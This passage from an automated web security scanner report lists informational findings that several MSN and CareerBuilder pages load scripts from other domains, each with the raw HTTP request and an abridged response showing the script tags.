Connection: close
Date: Sun, 30 Jan 2011 02:13:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.211. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.212. http://redacted/investor/partsub/funds/topfunds.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/topfunds.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js

Request

GET /investor/partsub/funds/topfunds.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
cache-control: private
pragma: no-cache
Content-Length: 28823
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:12:56 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.213. http://redacted/investor/quotewatchlist.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/quotewatchlist.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js
http://js.shared.live.com/2EGC9CgiideKzgDVwrdAdQ/liveframework.js

Request

GET /investor/quotewatchlist.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 22945
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:32 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:Web xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />

<script src="http://js.shared.live.com/2EGC9CgiideKzgDVwrdAdQ/liveframework.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script>
...[SNIP]...

23.214. http://redacted/money.search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/money.search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js

Request

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:15:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.215. http://movies.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 88675
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Movies
...[SNIP]...
</script>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.216. http://movies.redacted/academy-awards/snubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/academy-awards/snubs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43284
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
2011 Acade
...[SNIP]...
</LINK>

<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=166839766683429&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.217. http://movies.redacted/jason-statham/photo-gallery/feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/jason-statham/photo-gallery/feature/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
A Beginner
...[SNIP]...
</style>

<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.218. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48526
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Mom &
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.219. http://movies.redacted/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/new-on-dvd/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48135
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Movies New
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.220. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.221. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 52719
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.222. http://movies.redacted/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/the-rundown/the-guard/story_5/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 65403
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Movies
...[SNIP]...
</style>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.223. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58233
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=217c15685a7947bc834d222ac5644fdb-349642135-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842A95BF216FF78EBA0B15DE7242A948C767593FFCBD9946DC3EE96BBC153A559E56DD81A338B99D40F; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB50
Date: Sat, 29 Jan 2011 23:48:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.224. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=1376ce83848c458bad9f9645f4c3cfa3-349642136-XH-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F532F2B54CCD51E8D85817405B60EDB414DD584DBAE145C363A33CFCCCD28ABE3843C2AB1513C2FD; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB48
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
